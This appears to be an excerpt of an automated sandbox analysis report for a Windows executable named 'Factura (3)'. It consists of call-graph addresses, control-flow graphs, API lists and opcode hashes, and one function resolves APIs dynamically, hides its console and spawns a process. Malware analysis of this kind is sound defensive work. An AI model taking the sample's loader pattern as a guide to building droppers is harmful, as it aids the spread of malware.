7ff7340e2188 Concurrency::details::UMSSchedulerProxy::~UMSSchedulerProxy 20144->20145 20151 7ff7340e21c7 20144->20151 20152 7ff7340dfa70 20145->20152 20146 7ff7340e06f0 Concurrency::details::UMSSchedulerProxy::~UMSSchedulerProxy 47 API calls 20147 7ff7340e21f1 20146->20147 20147->19519 20147->19521 20150 7ff7340ee728 Concurrency::details::UMSSchedulerProxy::~UMSSchedulerProxy 76 API calls 20150->20151 20151->20146 20155 7ff7340dfa9d codecvt Concurrency::details::UMSSchedulerProxy::~UMSSchedulerProxy 20152->20155 20157 7ff7340dfaad 20152->20157 20153 7ff7340e7a40 std::_Locinfo::_Getcvt 8 API calls 20154 7ff7340dfc06 20153->20154 20154->20150 20156 7ff7340ef9c8 Concurrency::details::UMSSchedulerProxy::~UMSSchedulerProxy 78 API calls 20155->20156 20155->20157 20156->20157 20157->20153 20159 7ff7340dd3d4 Concurrency::details::WorkQueue::IsStructuredEmpty std::ios_base::failure::failure _Mpunct 20158->20159 20160 7ff7340dac20 _Mpunct 49 API calls 20159->20160 20161 7ff7340dd490 Concurrency::details::WorkQueue::IsStructuredEmpty _Mpunct char_traits 20159->20161 20160->20161 20161->19530 20163 7ff7340e6520 std::_Lockit::_Lockit 6 API calls 20162->20163 20164 7ff7340dcb75 20163->20164 20165 7ff7340dedc0 __int64 7 API calls 20164->20165 20166 7ff7340dcb8e std::locale::_Getfacet 20165->20166 20175 7ff7340dcbbb 20166->20175 20176 7ff7340e00a0 20166->20176 20167 7ff7340e6598 std::_Lockit::~_Lockit LeaveCriticalSection 20169 7ff7340dcc57 20167->20169 20169->19552 20171 7ff7340dcbdc 20172 7ff7340e1980 Concurrency::cancel_current_task 2 API calls 20171->20172 20172->20175 20173 7ff7340dcbe4 20174 7ff7340e69e8 std::_Facet_Register 4 API calls 20173->20174 20174->20175 20175->20167 20177 7ff7340dcbd6 20176->20177 20178 7ff7340e00c8 20176->20178 20177->20171 20177->20173 20178->20177 20179 7ff7340e7648 std::_Facet_Register 4 API calls 20178->20179 20181 7ff7340e00e4 20179->20181 20180 7ff7340e010b 20180->20177 20183 7ff7340de670 std::_Locinfo::~_Locinfo 83 API calls 20180->20183 20181->20180 20182 7ff7340dd860 85 API calls 20181->20182 20182->20180 20183->20177 20187 7ff7340de310 20184->20187 20186 7ff7340de412 Concurrency::details::VirtualProcessorRoot::VirtualProcessorRoot 20186->19555 20188 7ff7340de337 Concurrency::details::UMSSchedulerProxy::~UMSSchedulerProxy 20187->20188 20189 7ff7340de358 Concurrency::details::UMSSchedulerProxy::~UMSSchedulerProxy 20188->20189 20190 7ff7340e2170 Concurrency::details::UMSSchedulerProxy::~UMSSchedulerProxy 81 API calls 20188->20190 20189->20186 20190->20189 20192 7ff7340f7d04 _Getctype 47 API calls 20191->20192 20193 7ff7340f6ff5 20192->20193 20194 7ff7340f3bdc BuildCatchObjectHelperInternal 47 API calls 20193->20194 20195 7ff7340f7015 20194->20195 21943 7ff7340e5e60 21946 7ff7340e5e82 _Min_value _Mpunct Concurrency::details::UMSSchedulerProxy::~UMSSchedulerProxy 21943->21946 21948 7ff7340e5e7b 21943->21948 21944 7ff7340e5fdd 21947 7ff7340ef1b4 _fread_nolock 63 API calls 21944->21947 21944->21948 21946->21944 21946->21948 21949 7ff7340ef1b4 21946->21949 21947->21948 21952 7ff7340ef1d4 21949->21952 21953 7ff7340ef1cc 21952->21953 21954 7ff7340ef1fe 21952->21954 21953->21946 21954->21953 21955 7ff7340ef20d memcpy_s 21954->21955 21956 7ff7340ef24a 21954->21956 21958 7ff7340f3518 memcpy_s 11 API calls 21955->21958 21965 7ff7340ee5ec EnterCriticalSection 21956->21965 21960 7ff7340ef222 21958->21960 21962 7ff7340ee37c _invalid_parameter_noinfo 47 API calls 21960->21962 21962->21953 21308 7ff7340e4990 21309 7ff7340e49b7 Concurrency::details::UMSSchedulerProxy::~UMSSchedulerProxy 21308->21309 21312 7ff7340e4a80 21309->21312 21313 7ff7340e4ac9 codecvt 21309->21313 21319 7ff7340e49cc Concurrency::details::UMSSchedulerProxy::~UMSSchedulerProxy 21309->21319 21310 7ff7340e7a40 std::_Locinfo::_Getcvt 8 API calls 21311 7ff7340e4c1c 21310->21311 21320 7ff7340dbad0 21312->21320 21315 7ff7340e4b55 21313->21315 21316 7ff7340e4b49 21313->21316 21317 7ff7340ef9c8 Concurrency::details::UMSSchedulerProxy::~UMSSchedulerProxy 78 API calls 21315->21317 21315->21319 21318 7ff7340dbad0 _Fputc 78 API calls 21316->21318 21316->21319 21317->21319 21318->21319 21319->21310 21323 7ff7340eeebc 21320->21323 21324 7ff7340eeeec 21323->21324 21331 7ff7340eed54 21324->21331 21327 7ff7340edf90 _vswprintf_s_l 47 API calls 21328 7ff7340eef2a 21327->21328 21329 7ff7340dbaee 21328->21329 21330 7ff7340edf90 _vswprintf_s_l 47 API calls 21328->21330 21329->21319 21330->21329 21332 7ff7340eedaf 21331->21332 21333 7ff7340eed7a 21331->21333 21349 7ff7340ee5ec EnterCriticalSection 21332->21349 21335 7ff7340ee2b0 _vswprintf_s_l 47 API calls 21333->21335 21337 7ff7340eed9c 21335->21337 21337->21327 21337->21328 22663 7ff7340f7b84 22664 7ff7340f7b89 22663->22664 22668 7ff7340f7b9e 22663->22668 22669 7ff7340f7ba4 22664->22669 22670 7ff7340f7be6 22669->22670 22671 7ff7340f7bee 22669->22671 22673 7ff7340f80dc __free_lconv_mon 11 API calls 22670->22673 22672 7ff7340f80dc __free_lconv_mon 11 API calls 22671->22672 22674 7ff7340f7bfb 22672->22674 22673->22671 22675 7ff7340f80dc __free_lconv_mon 11 API calls 22674->22675 22676 7ff7340f7c08 22675->22676 22677 7ff7340f80dc __free_lconv_mon 11 API calls 22676->22677 22678 7ff7340f7c15 22677->22678 22679 7ff7340f80dc __free_lconv_mon 11 API calls 22678->22679 22680 7ff7340f7c22 22679->22680 22681 7ff7340f80dc __free_lconv_mon 11 API calls 22680->22681 22682 7ff7340f7c2f 22681->22682 22683 7ff7340f80dc __free_lconv_mon 11 API calls 22682->22683 22684 7ff7340f7c3c 22683->22684 22685 7ff7340f80dc __free_lconv_mon 11 API calls 22684->22685 22686 7ff7340f7c49 22685->22686 22687 7ff7340f80dc __free_lconv_mon 11 API calls 22686->22687 22688 7ff7340f7c59 22687->22688 22689 7ff7340f80dc __free_lconv_mon 11 API calls 22688->22689 22690 7ff7340f7c69 22689->22690 22695 7ff7340f7a54 22690->22695 22709 7ff7340f276c EnterCriticalSection 22695->22709 22052 7ff73410b26d 22053 7ff73410b27d Concurrency::details::UMSSchedulerProxy::~UMSSchedulerProxy 22052->22053 22056 7ff7340ee5f8 LeaveCriticalSection 22053->22056 21475 7ff73410b1d6 21478 7ff7340ee5f8 LeaveCriticalSection 21475->21478 21479 7ff7340e55d0 21480 7ff7340e55e8 Concurrency::details::UMSSchedulerProxy::~UMSSchedulerProxy 21479->21480 21482 7ff7340e5637 21479->21482 21480->21482 21483 7ff7340eeb48 21480->21483 21484 7ff7340eeb56 21483->21484 21486 7ff7340eeb5d 21483->21486 21489 7ff7340ee980 21484->21489 21487 7ff7340eeb5b 21486->21487 21492 7ff7340ee940 21486->21492 21487->21482 21499 7ff7340ee85c 21489->21499 21507 7ff7340ee5ec EnterCriticalSection 21492->21507 21506 7ff7340f276c EnterCriticalSection 21499->21506 22765 7ff7340e1bc0 22766 7ff7340e1bd8 22765->22766 22767 7ff7340e1be9 22765->22767 22769 7ff7340ee5f8 LeaveCriticalSection 22766->22769 20196 7ff7340f450d 20197 7ff7340f6fec __GSHandlerCheck_EH 47 API calls 20196->20197 20198 7ff7340f4512 20197->20198 20199 7ff7340f4583 20198->20199 20200 7ff7340f4539 GetModuleHandleW 20198->20200 20208 7ff7340f4410 20199->20208 20200->20199 20206 7ff7340f4546 20200->20206 20203 7ff7340f45c6 20206->20199 20222 7ff7340f4634 GetModuleHandleExW 20206->20222 20228 7ff7340f276c EnterCriticalSection 20208->20228 20210 7ff7340f442c 20211 7ff7340f4448 11 API calls 20210->20211 20212 7ff7340f4435 20211->20212 20213 7ff7340f27c0 Concurrency::details::SchedulerProxy::DeleteThis LeaveCriticalSection 20212->20213 20214 7ff7340f443d 20213->20214 20214->20203 20215 7ff7340f45dc 20214->20215 20229 7ff7340f4610 20215->20229 20217 7ff7340f45e9 20218 7ff7340f45ed GetCurrentProcess TerminateProcess 20217->20218 20219 7ff7340f45fe 20217->20219 20218->20219 20220 7ff7340f4634 3 API calls 20219->20220 20221 7ff7340f4605 ExitProcess 20220->20221 20223 7ff7340f4691 20222->20223 20224 7ff7340f4668 GetProcAddress 20222->20224 20225 7ff7340f4696 FreeLibrary 20223->20225 20226 7ff7340f469d 20223->20226 20227 7ff7340f467a 20224->20227 20225->20226 20226->20199 20227->20223 20232 7ff7340ff844 20229->20232 20231 7ff7340f4619 20231->20217 20233 7ff7340ff855 20232->20233 20234 7ff7340ff863 20233->20234 20236 7ff7340f8388 20233->20236 20234->20231 20237 7ff7340f81cc __crtLCMapStringW 5 API calls 20236->20237 20238 7ff7340f83b0 20237->20238 20238->20234

                                                      Executed Functions

                                                      Function 00007FF734106EA8 Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 143 7ff734106ea8-7ff734106f1b call 7ff734106a8c 146 7ff734106f35-7ff734106f3f call 7ff73410192c 143->146 147 7ff734106f1d-7ff734106f26 call 7ff7340f34f8 143->147 152 7ff734106f41-7ff734106f58 call 7ff7340f34f8 call 7ff7340f3518 146->152 153 7ff734106f5a-7ff734106fc3 CreateFileW 146->153 154 7ff734106f29-7ff734106f30 call 7ff7340f3518 147->154 152->154 156 7ff734106fc5-7ff734106fcb 153->156 157 7ff734107040-7ff73410704b GetFileType 153->157 170 7ff734107276-7ff734107296 154->170 160 7ff73410700d-7ff73410703b GetLastError call 7ff7340f348c 156->160 161 7ff734106fcd-7ff734106fd1 156->161 163 7ff73410709e-7ff7341070a5 157->163 164 7ff73410704d-7ff734107088 GetLastError call 7ff7340f348c CloseHandle 157->164 160->154 161->160 168 7ff734106fd3-7ff73410700b CreateFileW 161->168 166 7ff7341070ad-7ff7341070b0 163->166 167 7ff7341070a7-7ff7341070ab 163->167 164->154 177 7ff73410708e-7ff734107099 call 7ff7340f3518 164->177 173 7ff7341070b6-7ff73410710b call 7ff734101844 166->173 174 7ff7341070b2 166->174 167->173 168->157 168->160 182 7ff73410710d-7ff734107119 call 7ff734106c94 173->182 183 7ff73410712a-7ff73410715b call 7ff73410680c 173->183 174->173 177->154 182->183 190 7ff73410711b 182->190 188 7ff734107161-7ff7341071a3 183->188 189 7ff73410715d-7ff73410715f 183->189 192 7ff7341071c5-7ff7341071d0 188->192 193 7ff7341071a5-7ff7341071a9 188->193 191 7ff73410711d-7ff734107125 call 7ff7340f9034 189->191 190->191 191->170 195 7ff7341071d6-7ff7341071da 192->195 196 7ff734107274 192->196 193->192 194 7ff7341071ab-7ff7341071c0 193->194 194->192 195->196 199 7ff7341071e0-7ff734107225 CloseHandle CreateFileW 195->199 196->170 200 7ff73410725a-7ff73410726f 199->200 201 7ff734107227-7ff734107255 GetLastError call 7ff7340f348c call 7ff734101a6c 199->201 200->196 201->200
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                      • String ID:
                                                      • API String ID: 1617910340-0
                                                      • Opcode ID: 4e59b6a3bcf81a286121f2dea03035ec71c8f623c03c3a2726caf4022269a2f0
                                                      • Instruction ID: dd2ec67b62ec3b42660a414c23fedf0f981771a27fe71a08c676d07fac298f84
                                                      • Opcode Fuzzy Hash: 4e59b6a3bcf81a286121f2dea03035ec71c8f623c03c3a2726caf4022269a2f0
                                                      • Instruction Fuzzy Hash: C1C1D033B28E4295EB18EFA6E4D42AC7761E749BA8F514235DA2E97394CF38E011D710
                                                      Function 00007FF7340D94C0 Relevance: 23.1, APIs: 12, Strings: 1, Instructions: 375libraryloaderprocessCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 7ff7340d94c0-7ff7340d9816 call 7ff7340d9c80 call 7ff7340e2920 GetModuleHandleA call 7ff7340d9d20 call 7ff7340e2920 GetProcAddress call 7ff7340d9dc0 call 7ff7340e2880 GetProcAddress call 7ff7340d9e60 call 7ff7340e2a60 GetProcAddress call 7ff7340d9f00 call 7ff7340e26a0 GetProcAddress call 7ff7340d9fc0 call 7ff7340e2880 GetProcAddress call 7ff7340da060 call 7ff7340e29c0 GetProcAddress FreeConsole call 7ff7340d1220 call 7ff7340f24c4 call 7ff7340f2498 call 7ff7340da180 call 7ff7340e2560 call 7ff7340e56a0 call 7ff7340da100 call 7ff7340e24c0 call 7ff7340daa70 call 7ff7340daa10 call 7ff7340de4e0 * 2 call 7ff7340da1f0 call 7ff7340e2420 call 7ff7340f265c 60 7ff7340d9823-7ff7340d983c call 7ff7340de4e0 0->60 61 7ff7340d9818-7ff7340d9821 0->61 66 7ff7340d9c5d-7ff7340d9c75 call 7ff7340e7a40 60->66 61->60 62 7ff7340d9841-7ff7340d994c call 7ff7340da260 call 7ff7340e22e0 call 7ff7340dd310 call 7ff7340daa10 call 7ff7340da9b0 call 7ff7340de4e0 * 2 call 7ff7340e768c 61->62 84 7ff7340d995b-7ff7340d9968 62->84 85 7ff7340d9991-7ff7340d9aea call 7ff7340dcea0 call 7ff7340e5d70 call 7ff7340e2200 call 7ff7340e7684 call 7ff7340da2b0 call 7ff7340e27e0 call 7ff7340daad0 call 7ff7340e1fc0 CreateProcessA 84->85 86 7ff7340d996a-7ff7340d998f 84->86 106 7ff7340d9af0-7ff7340d9be0 call 7ff7340da480 call 7ff7340e2380 GetLastError call 7ff7340da3b0 call 7ff7340e2740 call 7ff7340da660 call 7ff7340dea80 call 7ff7340da660 call 7ff7340dec50 call 7ff7340de4e0 call 7ff7340df160 call 7ff7340de4e0 * 2 85->106 107 7ff7340d9be2-7ff7340d9c56 call 7ff7340de4e0 call 7ff7340df160 call 7ff7340de4e0 * 2 85->107 86->84 106->66 107->66
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: AddressProc$Concurrency::details::EmptyQueue::StructuredWork$CallConsoleCreateErrorFreeFunction0HandleLastMemberModuleProcessstd::bad_exception::~bad_exception
                                                      • String ID: h
                                                      • API String ID: 2797511836-2439710439
                                                      • Opcode ID: 3fe42faaf75b140fe51262ce875f1b0c46b9b7e78531efefefb824384dd147ab
                                                      • Instruction ID: 8fd268e77b22e0e6e2a2a2da090860822614af6cbdc73752348fdd65a6329a39
                                                      • Opcode Fuzzy Hash: 3fe42faaf75b140fe51262ce875f1b0c46b9b7e78531efefefb824384dd147ab
                                                      • Instruction Fuzzy Hash: B1024C32709AC6A1DA64EB56E4903EBF3A1FBC5780F804435D68D83B99EE7CD148DB50
                                                      Function 00007FF7340F81CC Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • FreeLibrary.KERNEL32(?,?,?,00007FF7340F89C0,?,?,?,?,00007FF7340F27E5,?,?,?,?,00007FF7340E6534), ref: 00007FF7340F8348
                                                      • GetProcAddress.KERNEL32(?,?,?,00007FF7340F89C0,?,?,?,?,00007FF7340F27E5,?,?,?,?,00007FF7340E6534), ref: 00007FF7340F8354
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: AddressFreeLibraryProc
                                                      • String ID: api-ms-$ext-ms-
                                                      • API String ID: 3013587201-537541572
                                                      • Opcode ID: 3b0c198edbfeba13af139ee6d5da1187995b31040557d0efa468b4099af4e768
                                                      • Instruction ID: 95ae299442b619096826599d2fa7a8c925bfda69c114602556816a4c13031ed7
                                                      • Opcode Fuzzy Hash: 3b0c198edbfeba13af139ee6d5da1187995b31040557d0efa468b4099af4e768
                                                      • Instruction Fuzzy Hash: 0B41E122B1AE02A1EA5DAF17A8C45B9A2D1BF05BE0F895135DD0DD7794EF3CE405A320
                                                      Function 00007FF7340F9DDC Relevance: 6.2, APIs: 4, Instructions: 218COMMONLIBRARYCODE
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 232 7ff7340f9ddc-7ff7340f9e01 233 7ff7340fa0cf 232->233 234 7ff7340f9e07-7ff7340f9e0a 232->234 235 7ff7340fa0d1-7ff7340fa0e1 233->235 236 7ff7340f9e43-7ff7340f9e6f 234->236 237 7ff7340f9e0c-7ff7340f9e3e call 7ff7340ee2b0 234->237 238 7ff7340f9e71-7ff7340f9e78 236->238 239 7ff7340f9e7a-7ff7340f9e80 236->239 237->235 238->237 238->239 241 7ff7340f9e82-7ff7340f9e8b call 7ff7340fb728 239->241 242 7ff7340f9e90-7ff7340f9ea5 call 7ff7341045bc 239->242 241->242 247 7ff7340f9fbf-7ff7340f9fc8 242->247 248 7ff7340f9eab-7ff7340f9eb4 242->248 249 7ff7340fa01c-7ff7340fa041 WriteFile 247->249 250 7ff7340f9fca-7ff7340f9fd0 247->250 248->247 251 7ff7340f9eba-7ff7340f9ebe 248->251 252 7ff7340fa043-7ff7340fa049 GetLastError 249->252 253 7ff7340fa04c 249->253 254 7ff7340f9fd2-7ff7340f9fd5 250->254 255 7ff7340fa008-7ff7340fa01a call 7ff7340f9894 250->255 256 7ff7340f9ec0-7ff7340f9ec8 call 7ff7340f1bb0 251->256 257 7ff7340f9ecf-7ff7340f9eda 251->257 252->253 258 7ff7340fa04f 253->258 259 7ff7340f9ff4-7ff7340fa006 call 7ff7340f9ab4 254->259 260 7ff7340f9fd7-7ff7340f9fda 254->260 275 7ff7340f9fac-7ff7340f9fb3 255->275 256->257 262 7ff7340f9edc-7ff7340f9ee5 257->262 263 7ff7340f9eeb-7ff7340f9f00 GetConsoleMode 257->263 266 7ff7340fa054 258->266 259->275 267 7ff7340fa060-7ff7340fa06a 260->267 268 7ff7340f9fe0-7ff7340f9ff2 call 7ff7340f9998 260->268 262->247 262->263 271 7ff7340f9f06-7ff7340f9f0c 263->271 272 7ff7340f9fb8 263->272 276 7ff7340fa059 266->276 277 7ff7340fa06c-7ff7340fa071 267->277 278 7ff7340fa0c8-7ff7340fa0cd 267->278 268->275 273 7ff7340f9f95-7ff7340f9fa7 call 7ff7340f941c 271->273 274 7ff7340f9f12-7ff7340f9f15 271->274 272->247 273->275 282 7ff7340f9f20-7ff7340f9f2e 274->282 283 7ff7340f9f17-7ff7340f9f1a 274->283 275->266 276->267 284 7ff7340fa073-7ff7340fa076 277->284 285 7ff7340fa09f-7ff7340fa0a9 277->285 278->235 289 7ff7340f9f30 282->289 290 7ff7340f9f8c-7ff7340f9f90 282->290 283->276 283->282 291 7ff7340fa08f-7ff7340fa09a call 7ff7340f34d4 284->291 292 7ff7340fa078-7ff7340fa087 284->292 287 7ff7340fa0b0-7ff7340fa0bf 285->287 288 7ff7340fa0ab-7ff7340fa0ae 285->288 287->278 288->233 288->287 293 7ff7340f9f34-7ff7340f9f4b call 7ff734104804 289->293 290->258 291->285 292->291 298 7ff7340f9f83-7ff7340f9f89 GetLastError 293->298 299 7ff7340f9f4d-7ff7340f9f59 293->299 298->290 300 7ff7340f9f5b-7ff7340f9f6d call 7ff734104804 299->300 301 7ff7340f9f78-7ff7340f9f7f 299->301 300->298 305 7ff7340f9f6f-7ff7340f9f76 300->305 301->290 303 7ff7340f9f81 301->303 303->293 305->301
                                                      APIs
                                                      • GetConsoleMode.KERNEL32(?,?,?,?,?,?,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00007FF734108D09), ref: 00007FF7340F9EF8
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00007FF734108D09), ref: 00007FF7340F9F83
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: ConsoleErrorLastMode
                                                      • String ID:
                                                      • API String ID: 953036326-0
                                                      • Opcode ID: 2151d4ce3eec4ed79f378546bdaaa0655b0e1ed4ee55494e16d1ab3d04857c73
                                                      • Instruction ID: cb4b739c0dc9433e5c3e66dd4ef832fba52778dec1ec917fd11ea6907412e7f9
                                                      • Opcode Fuzzy Hash: 2151d4ce3eec4ed79f378546bdaaa0655b0e1ed4ee55494e16d1ab3d04857c73
                                                      • Instruction Fuzzy Hash: 0C911632F09651A5F758AF6694C02BDABE0FB44B88F940179DE4EA3684CF3CD445EB20
                                                      Function 00007FF7340F8824 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMONLIBRARYCODE
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: String
                                                      • String ID: LCMapStringEx
                                                      • API String ID: 2568140703-3893581201
                                                      • Opcode ID: 0779eb7b2c8fc791242d77480640b29f5f904a4d28405e433465b3ad06adad93
                                                      • Instruction ID: dc6db93d51e40cdf9bdba52b10c179d01e19cea2b05b88dbbde52aa40a8eb5fe
                                                      • Opcode Fuzzy Hash: 0779eb7b2c8fc791242d77480640b29f5f904a4d28405e433465b3ad06adad93
                                                      • Instruction Fuzzy Hash: 15214F36B08B8196D764DF16B48029AF7A4FB88BC0F944136EE8D83B19DF3CD4508B00
                                                      Function 00007FF7340F45DC Relevance: 4.5, APIs: 3, Instructions: 14COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: Process$CurrentExitTerminate
                                                      • String ID:
                                                      • API String ID: 1703294689-0
                                                      • Opcode ID: eddd917cfcc4647a87df738ea11f378e0bdf5e155613cf48a3517cfcac9b31cc
                                                      • Instruction ID: b8abdaaf794c2768783b72066aaeca8962fc43ba41e8d4fd683550bd619a8ac3
                                                      • Opcode Fuzzy Hash: eddd917cfcc4647a87df738ea11f378e0bdf5e155613cf48a3517cfcac9b31cc
                                                      • Instruction Fuzzy Hash: 58D01724B0AB02A2EA0C7F7268C803892511FA8B00B901478C80A82393ED3CA44DAA22
                                                      Function 00007FF734100540 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 128COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: Info
                                                      • String ID:
                                                      • API String ID: 1807457897-3916222277
                                                      • Opcode ID: 2b0004135f5c55f3b752ccc70fa7117fa448ae8c819cd30d1aa712bcf1a2d8bb
                                                      • Instruction ID: 2246f3003ab7c4d490ca7c77a40cacd5fc3e51149e537559b22c99e546af935c
                                                      • Opcode Fuzzy Hash: 2b0004135f5c55f3b752ccc70fa7117fa448ae8c819cd30d1aa712bcf1a2d8bb
                                                      • Instruction Fuzzy Hash: 1851D332A1CAC19AE7249F25F0883AEBBA1F789344FA40136D78D83A85CF7CD145DB51
                                                      Function 00007FF734100ACC Relevance: 3.2, APIs: 2, Instructions: 194COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
